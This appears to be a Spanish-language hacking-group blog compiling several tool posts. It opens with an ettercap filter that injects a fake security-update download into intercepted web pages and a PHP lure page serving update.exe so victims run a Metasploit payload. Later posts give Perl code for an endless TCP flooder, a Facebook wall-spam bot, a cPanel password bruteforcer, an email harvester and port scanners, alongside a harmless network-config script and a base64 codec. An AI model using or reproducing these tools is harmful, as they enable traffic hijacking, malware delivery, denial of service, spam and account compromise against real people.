2 Ideas de como hacer que descargen y usen nuestros payloads
by DarkSpark on Jan.26, 2010, under Vide0s
primero que nada, este no es un video tutorial, la intencion es simplemente mostrar dos formas distintas de lograr que las “victimas” descargen y ejecuten un payload para asi obtener una shell con metasploit.
cualquier duda sobre como se realizan las tecnicas utilizadas en el video, pueden preguntar en el foro =)
Filtro Utilizado en el video ( cortesia de Pandemic)
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, “Accept-Encoding”)) {
replace(”Accept-Encoding”, “Accept-Be-Owned”);
}
}if (ip.proto == TCP && tcp.src == 80) {
if (search(DATA.data, “<title>”)) {
replace(”</title>”, “</title><form
action=”http://192.168.1.67/update.exe” method=”link”><center><img src=”http://192.168.1.67/alert.jpg”><br><br><INPUT TYPE=submit value=”Descargar actualizacion”></form><html><body><h1><font color=red>Alerta de seguridad</font></h1></body></html>”);
replace(”<head>”, “<head> <title> Software Upgrade </title> <body><font color=black size=10> Please download the last Active X security upgrade to Continue </font><body text=”#ffffff” link=”#ffff33″ alink=”#ffffcc” alink=”ffff00″></center> </body> </head>” “);
msg(”Filtro activado.\n”);
msg(”html inyectado exitosamente!!”);
}}
Index Utilizado en el vodeo:
<?php
$navegador = getenv(”HTTP_USER_AGENT”);
if (preg_match(”/MSIE/i”, “$navegador”))
{
echo “<html>
<head>
<META http-equiv=’Content-Type’ content=’text/html; charset=utf-8′>
<style>
body
{
background-image:url(’ie-8.jpg’);
background-repeat: no-repeat;
background-position:center;
}
</style>
</head>
<body><h2 align=’center’><font color=’red’>Actualizacion Critica De Seguridad</font></h2><br>
<h3><pre><center><a href=’http://www.microsoft.com/spain/technet/security/bulletin/ms10-002.mspx’>MS10-002:</a> trata las vulnerabilidades en Internet Explorer (KB 978207)Los profesionales de TI y los administradores de sistemas deben consultar <a href=’http://www.microsoft.com/spain/technet/security/bulletin/current.mspx’>TechNet</a><br>de Microsoft para obtener información detallada acerca de estas actualizaciones.
</pre></h3>
<h2 align=’center’><a href=’update.exe’>Descargar Actualizacion</a></h2>“;
}
else if (preg_match(”/Mozilla/i”, “$navegador”))
{
echo “<html>
<head>
<body background=’bg.jpg’>
<table width=50% align=’center’>
<tr>
<td><img src=’banner.png’ align=’center’></td>
</tr>
</table> <center>
<h1 align=’center’><font color=red>Actualizacion Critica De Seguridad</font></h1>
<h3>no te dejes sorprender actualiza firefox, y navega seguro por la red</h3>
<a href=http://192.168.1.67/update.exe>Descargar Actualizacion</a></center>“;
}?>
sockeRTCP [s3cure]
by s3cure on Dec.26, 2009, under Toolz en Perl
hi hi:
Perlitas con TK. Se trata de un Sock (Envia sock de manera infinita {bucle}, para ports TCP.
Espero que lo puedan saber usar, es muy simple xD.
screenshot: http://img683.imageshack.us/img683/751/pantallazosockertcp.png
c0de:
#!/usr/bin/perl
####################################
# Hacking & Security Latin Team #
# - Illusions #
# hslteam.com! - illusions #
# c0dex by s3cure #
# sockeRTCP #
####################################
use IO::Socket;
use Tk;
system("clear");
print "Console:\n";
#configure
my $win = MainWindow->new();
$win->configure(-title => "sockeRTCP - Illusions", -background => "black");
$win->geometry('+600+450');
#frame1, label1 n entry1.
my $frame1 = $win->Frame(-relief=>'groove', -background => "black",)->pack(-side => 'top', -fill => 'x');
my $label1 = $frame1->Label(-text=> "Target:", -background => "black", -foreground => "white",)->pack(-side => 'left');
my $ent1 = $frame1->Entry(-width => 12, -background => "white")->pack(-side => 'left', -pady => 3);
#frame2, label2 n entry2.
my $frame2 = $win->Frame(-relief=>'groove', -background => "black",)->pack(-side => 'top', -fill => 'x');
my $label2 = $frame2->Label(-text=> "Port:", -background => "black", -foreground => "white",)->pack(-side => 'left');
my $ent2 = $frame2->Entry(-width => 4, -background => "white")->pack(-side => 'left', -pady => 3);
#frame3, label3 n entry3.
my $frame3 = $win->Frame(-relief=>'groove', -background => "black",)->pack(-side => 'top', -fill => 'x');
my $label3 = $frame3->Label(-text=> "Socket Print:", -background => "black", -foreground => "white",)->pack(-side => 'left');
my $ent3 = $frame3->Entry(-width => 10, -background => "white")->pack(-side => 'left', -pady => 3);
#button start
$ataque = $frame3->Button(-text=>"SockeR",-command => \&atack)->pack(-side=>'bottom');
#status
my $frame4 = $win->Frame(-relief=>'groove', -background => "black",)->pack(-side => 'top', -fill => 'x');
my $stat = $frame4->Text(-width => 38, -height => 1)->pack(-side=>'bottom');
sub atack
{
#get vars
$target = $ent1->get();
$port = $ent2->get();
$xz12 = $ent3->get();
$sock = new IO::Socket::INET (
PeerAddr => "$target",
PeerPort => "$port",
Proto => "TCP",
);
bucle:;
print $sock "$xz12";
goto bucle;
}
MainLoop();
salu2, s3cure.
AutoInet [s3cure].
by s3cure on Dec.25, 2009, under Toolz en Perl
Un script para configurar la red eth0 y dns en unix :) automatizado, por si no conocen mucho del os, etc. Más que nada, practica :P
#!/usr/bin/perl
# AutoInet
# by s3cure | HSLTeam.com + – Illusions
# – Illusions.hslteam.com
system(”clear”);
print “\nAutoInet configure\nby s3cure\nHSLTeam.com!\n- Illusions\n”;
print “Configure internet with interfaces n resolv\n”;
print “Follow instructions please.\n”;
sleep(2);
print “Configure Eth0? Y/N “;
$resp2=<STDIN>;
if ($resp2 eq “Y”)
{
eth0();
}
else
{
antdn();
}
sub eth0{
print “auto eth0? Y/N “;
$autoeth=<STDIN>;
if ($autoeth eq “Y”)
{
system(”sudo echo ‘auto eth0′ > /etc/network/interfaces”);
}
else
{
system(”sudo echo ‘#auto eth0′ > /etc/network/interfaces”);
}
system(”sudo echo ‘iface eth0 inet static’ >> /etc/network/interfaces”);
print “Address: “;
$adress=<STDIN>;
system(’sudo echo “\t address $adress” >> /etc/network/interfaces’);
print “Netmask(default: 255.255.255.0): “;
$netmask=<STDIN>;
system(’sudo echo “\t netmask $netmask” >> /etc/network/interfaces’);
print “Gateway: “;
$gateway=<STDIN>;
system(’sudo echo “\t gateway $gateway” >> /etc/network/interfaces’);
print “Config Eth0 [Ok!]\n”;
sleep(1);
}
sub antdn{
print “DNS Configure? Y/N “;
$asd=<STDIN>;
if ($asd3 eq “Y”)
{
dns();
}
else
{
view();
}
}
sub dns{
print “Nameserver1: “;
$nameserver=<STDIN>;
system(’sudo echo “nameserver $nameserver” > /etc/resolv.conf’);
print “Nameserver2: “;
$nameserv2=<STDIN>;
system(’sudo echo “nameserver $nameserv2″ >> /etc/resolv.conf’);
}
sub view{
print “View results n restart networking? Y/N “;
$qew4=<STDIN>;
if ($qew4 eq “Y”)
{
result();
}
else
{
&dew
}
}
sub result{
print “Inet results:\n”;
print “Network-Interfaces:\n”;
system(”cat /etc/network/interfaces”);
print “DNS:\n”;
system(”cat /etc/resolv.conf”);
print “Wait one moment…\n”;
system(”sudo /etc/init.d/networking restart”);
print “Restart Network [Ok!]“;
sleep(1);
}
sub dew{
print “s3cure: Thanks, visit HSLTeam.com n subdomains!\n”;
print “Press Intro to exit.\n”;
$adios=<STDIN>;
}salu2.
Facebook-spam[bot] by s3cure.
by s3cure on Dec.23, 2009, under Toolz en Perl
Bot para spamming de muros y esas porquerías de facebook. by s3cure.
requiere samie y ole. sólo win /:.
#!c:/perl/bin
#c0dex by m0x.lk || HSLTeam.com
# Facebook-spam
system("cls");
system("color 03");
print "\nFacebook-spam\n";
print "c0dex by m0x.lk || HSLTeam.com\n";
print "Start SPAM -\n\n";
use Win32::OLE;
use Win32::SAM;
my $post;
my $text;
my $email;
my $pass;
$| = 1;
$Win32::OLE::Warn = 3;
print "Email: ";
$email=<STDIN>;
print "Passwd: ";
$pass=<STDIN>;
print "\nMURO-SPAM: ";
$post=<STDIN>;
print "Text-SPAM: ";
$text=<STDIN>;
print "\nStart-SPAM ++ (Ctrl + C to Close Script)\n";
StartIE();
Navigate("http://www.facebook.com/logout.php?h=adec46c20c48ec123573248cb3c2e6b5&t=1259627549&ref=mb");
SetEditBox("email","$email");
SetEditBox("pass","$pass");
ClickFormButton("Entrar");
spam: ;
Navigate("$post");
SetEditBox("add_comment_text","$text");
ClickFormButton("comment");
goto spam;
Check-Dirs [s3cure].
by s3cure on Dec.23, 2009, under Toolz en Perl
Es muy simple su uso. by s3cure.
#!/usr/bin/perl
##############
# Check-Dirs #
# by s3cure #
# HSLTeam.com#
# -Illusions #
##############
use LWP::Simple;
print "\nCheck-Dirs\n";
print "HSLTeam.com | - Illusions\nby s3cure\n";
print "\nTarget: ";
$target=<STDIN>;
print "Directory list: ";
$dirs=<STDIN>;
open(FILE, "<$dirs") || die "[!] Directory List -Not Found\n";
my @dirs=<FILE>;
close(FILE);
foreach my $dirs(@dirs){
$ua = LWP::UserAgent->new;
my $response = $ua->get("$target/$dirs");
if($response->status_line !~ m/^404/){
print(@ok,"$target/$dirs");
}
}
print "No more results\n";
salu2.
cPanel bruteforce by s3cure.
by s3cure on Dec.20, 2009, under Toolz en Perl
Bruteforce de cPanel. por s3cure.
#!/usr/bin/perl
######################
# cPanel bruteforce #
# s3cure|HSLTeam.com!#
######################use WWW::Mechanize;
print “\nHacking & Security Latin Team\n”;
print “cPanel bruteforce\n”;
print “by s3cure – HSLTeam.com!\n”;
print “\nTarget: “;
$url=<STDIN>;
print “Username: “;
$username=<STDIN>;
print “Passwd list: “;
$password=<STDIN>;
open (FILE, “<$password”) || die “Not found passwd list.\n”;
@PASSWORDS = <FILE>;
close PASSFILE;
foreach my $P (@PASSWORDS) {
chomp $P;
$passwd = $P;
}my $mechanize = WWW::Mechanize->new(autocheck => 1);
$mechanize->get($url) || die “Failed connect to target!\n”;
$mechanize->submit_form(
form_number => 1,
fields => {
login_username => $username,
login_password => $passwd
}
);
print $mechanize->content( );
if (content =~ /Find/) {
print “\nPassword: $passwd”;
exit(0);
}
Mail Xtractor by s3cure
by s3cure on Dec.20, 2009, under Toolz en Perl
MailXtractor by s3cure.
#!/usr/bin/perl
# MailXtractor
# by s3cure
# HSLTeam.com!print “MailXtractor by s3cure|m0x.lk\n”;
print “HSLTeam.com!\n\n”;
print “Mails.txt: “;
$mailtxt=<STDIN>;
print “Output.txt: “;
$outmail=<STDIN>;
print “Start…\n”;open(SEARCH,”<$mailtxt”);
@SEARCH = <SEARCH>;
close(SEARCH);open(FILE,”<$mailtxt”) || die “Not found $mailtxt\n”;
foreach $line (@SEARCH) {
if ($line =~ m{(\w+\@[\w.]+)}) {
open(FIN,”>$outmail”);
print FIN “$line\n”;
}
}
close(FIN);
close(FILE);
print “\nMailtxt: $mailtxt\n”;
print “Output result: $outmail\n”;
print “Ready n result saved.”;
print “\nHSLTeam.com!\n”;
Port-Scanner.
by s3cure on Dec.14, 2009, under Toolz en Perl
Leer intrucciones :) by 0×8c.
#!/usr/bin/perl use IO::Socket::INET; use Getopt::Long; my $ip = $ARGV[0]; my %options = (); GetOptions( \%options, “r=s”, “p=s” ); print q { ================================================================================ # title: Port scanner # coder: 0×8c # site: www.hslteam.com # e-mail: < 0×8c.security@gmail.com > Usage: perl portscanner.pl [ip] {options} Options: -r [start_port-end_port] define range to scan. -p [ip:port] scan with proxy support. ================================================================================ }; if( !$ip ) { die “[+] Need to define ip to scan\n”; } my( $proxy_address, $proxy_port, @proxy ); if( $options{”p”} ) { @proxy = split( /:/, $options{”p”}, 2 ); $proxy_address = $proxy[0]; $proxy_port = $proxy[1]; print “[+] Proxy armed…\n\n”; } else { $proxy_address = “127.0.0.1″; $proxy_port = “”; print “[+] No proxy…\n”; } my( $port, $start_port, $end_port, @ports, $scan ); if( $options{”r”} ) { print “[+] Range defined…\n”; @ports = split( /-/, $options{”r”}, 2 ); $start_port = $ports[0]; $end_port = $ports[1]; print “[+] Open port(s):”; for( $port = $start_port; $port <= $end_port; $port++ ) { $scan = scan( $ip, $port ); if( $scan eq “done” ) { print ” $port -”; } } } else { @ports = qw ( 21 22 23 25 43 59 79 80 110 113 119 135 139 445 548 1025 5000 5900 6660 6661 6662 6663 6665 6666 6667 6668 6669 7000 8000 8018 8080 ); print “[+] Open port(s):”; foreach $port( @ports ) { $scan = scan( $ip, $port ); if( $scan eq “done” ) { print ” $port -”; } } } sub scan { my $connect = IO::Socket::INET->new ( Proto => ‘tcp’, PeerAddr => $ip, PeerPort => $port, ProxyAddr => $proxy_address, ProxyPort => $proxy_port ); if( $connect ) { return “done”; } close( $connect ); }
Base64 Enc/Dec. [0x8c].
by s3cure on Dec.07, 2009, under Toolz C / C + + / C #
by 0×8c.
/**********************************/
/* */
/* Autor : 0x8c */
/* Web: www.HSLTeam.com */
/* */
/**********************************/
#include <stdlib.h>
// Return string's length
int strlen (char* string)
{
int c = 0;
while (string [c] != '\x00')
c++;
return c;
}
// Return the power of given number
int powz (int base, int exp)
{
int ris = 1, c = 0;
while (c < exp)
{
ris *= base;
c++;
}
return ris;
}
// Return decimal value of a binary number
int bin2dec (int* n, int exp)
{
int dec = 0, c = 0, x = exp+1;
while (c < x)
{
dec += powz (2, exp) * n [c];
exp--;
c++;
}
return dec;
}
// Return binary value of given decimal number
int* dec2bin (int n)
{
int* dec = (int*) malloc (6*sizeof (int));
int c = 5;
while (n >= 1)
{
if (n % 2 == 0)
dec [c] = 0;
else
dec [c] = 1;
n /= 2;
c--;
}
while (c >= 0)
{
dec [c] = 0;
c--;
}
return dec;
}
// Return binary value of given character
int* char2bin (char x)
{
int d = (int) x, c = 7;
int* n = (int*) malloc (8*sizeof (int));
while (d >= 1)
{
if (d % 2 == 0)
n [c] = 0;
else
n [c] = 1;
d /= 2;
c--;
}
while (c >= 0)
{
n [c] = 0;
c--;
}
return n;
}
// Return base64 value of given string
char* base64_encode (char* string)
{
char chr [] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
int binval [strlen (string)] [8];
int *tmp = (int*) malloc (8*sizeof (int));
int y,x, tmp_x, tmp_y, oth_y, u = 0;
y = 0;
while (y < strlen (string))
{
tmp = char2bin (string [y]);
x = 0;
while (x < 8)
{
binval [y] [x] = tmp [x];
x++;
}
y++;
}
if (strlen (string)*8 % 6 == 0)
y = strlen (string)*8/6;
else
{
y = strlen (string)*8/6 + 1;
u = y*6 - strlen (string)*8;
}
int sixsqr [y] [6];
x = 0;
oth_y = 0;
tmp_x = 0;
tmp_y = 0;
while (tmp_y < y)
{
if ((binval [oth_y] [x] == 1) || (binval [oth_y] [x] == 0))
sixsqr [tmp_y] [tmp_x] = binval [oth_y] [x];
else
sixsqr [tmp_y] [tmp_x] = 0;
if (x == 7)
{
x = 0;
oth_y++;
}
else
x++;
if (tmp_x == 5)
{
tmp_y++;
tmp_x = 0;
}
else
tmp_x++;
}
char* base64 = (char*) malloc (y*sizeof (char)+u/2*sizeof (char));
tmp_y = 0;
tmp = (int*) realloc (tmp, 6*sizeof (int));
while (tmp_y < y)
{
tmp_x = 0;
while (tmp_x < 6)
{
tmp [tmp_x] = sixsqr [tmp_y] [tmp_x];
tmp_x++;
}
base64 [tmp_y] = chr [bin2dec (tmp,5)];
tmp_y++;
}
while (u > 0)
{
base64 [tmp_y] = '=';
tmp_y++;
u -= 2;
}
x = 0;
while (x < strlen (base64))
{
y = 0;
oth_y = 0;
while (y < strlen (chr))
{
if ((base64 [x] == chr [y]) || (base64 [x] == '='))
oth_y = 1;
y++;
}
if (!oth_y)
base64 [x] = '\x00';
x++;
}
return base64;
}
// Return text value of given base64 string
char* base64_decode (char* base64)
{
char chr [] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
int x = 0, y, pos, tmp_x, tmp_y, oth_y;
int* tmp = (int*) malloc (6*sizeof (int));
while (x < strlen (base64))
{
if (base64 [x] == '=')
base64 [x] = '\x00';
x++;
}
int sixsqr [strlen (base64)] [6];
y = 0;
while (y < strlen (base64))
{
pos = 0;
while (chr [pos] != base64 [y])
pos++;
tmp = dec2bin (pos);
x = 0;
while (x < 6)
{
sixsqr [y] [x] = tmp [x];
x++;
}
y++;
}
y = strlen (base64)*6/8;
int eightsqr [y] [8];
tmp_x = 0;
tmp_y = 0;
oth_y = 0;
x = 0;
while (tmp_y < y)
{
eightsqr [tmp_y] [tmp_x] = sixsqr [oth_y] [x];
if (tmp_x == 7)
{
tmp_y++;
tmp_x = 0;
}
else
tmp_x++;
if (x == 5)
{
oth_y++;
x = 0;
}
else
x++;
}
char* string = (char*) malloc (y*sizeof (char));
tmp = (int*) realloc (tmp, 8*sizeof (int));
tmp_y = 0;
while (tmp_y < y)
{
tmp_x = 0;
while (tmp_x < 8)
{
tmp [tmp_x] = eightsqr [tmp_y] [tmp_x];
tmp_x++;
}
string [tmp_y] = (char) bin2dec (tmp,7);
tmp_y++;
}
return string;
}
Port Scanner [0x8c]
by s3cure on Dec.07, 2009, under Toolz C / C + + / C #
Hi hi, tool para scanear puertos por 0×8c.
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
int main(int argc, char *argv[] )
{
int status, sock, min_port,max_port,port;
char *ip, *port_string;
struct addrinfo hints, *res, *p;
printf("\Port Scanner\n");
printf("\Written by 0x8c\n");
if ( argc != 4 ) {
fprintf(stderr,"Too few argument! Usage >> ./port_scan 'ip_addr' 'min_port' 'max_port\n\n");
return 1;
}
min_port = atoi(argv[2]);
max_port = atoi(argv[3]);
ip = ( char * ) malloc ( strlen (argv[1]) * sizeof(char) );
strcpy(ip, argv[1]);
memset (&hints, 0, sizeof hints);
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
for ( port = min_port; port <= max_port; port++ ) {
port_string = (char*)malloc(4);
sprintf(port_string,"%d",port);
if ( ( status = getaddrinfo( ip, port_string, &hints, &res ) ) != 0 ) {
fprintf(stderr,"getaddrinfo() error : %s\n", gai_strerror(status));
exit(1);
}
for ( p = res; p != NULL; p = p->ai_next) {
if ( ( sock = socket( p->ai_family, p->ai_socktype, p->ai_protocol)) == -1 ) {
fprintf(stderr,"Couldn't create socket! Exiting!\n");
exit(2);
}
else {
if ( ( connect( sock, p->ai_addr, p->ai_addrlen ) == -1 )) {
close(sock);
}
else {
printf("Opened port %s on : %s\n", port_string, ip);
}
}
close(sock);
}
freeaddrinfo(res);
free(port_string);
}
free(ip);
printf("Correctly scanned...\n");
getchar();
}
http://www.hslteam.com/forum/index.php?topic=1347.0
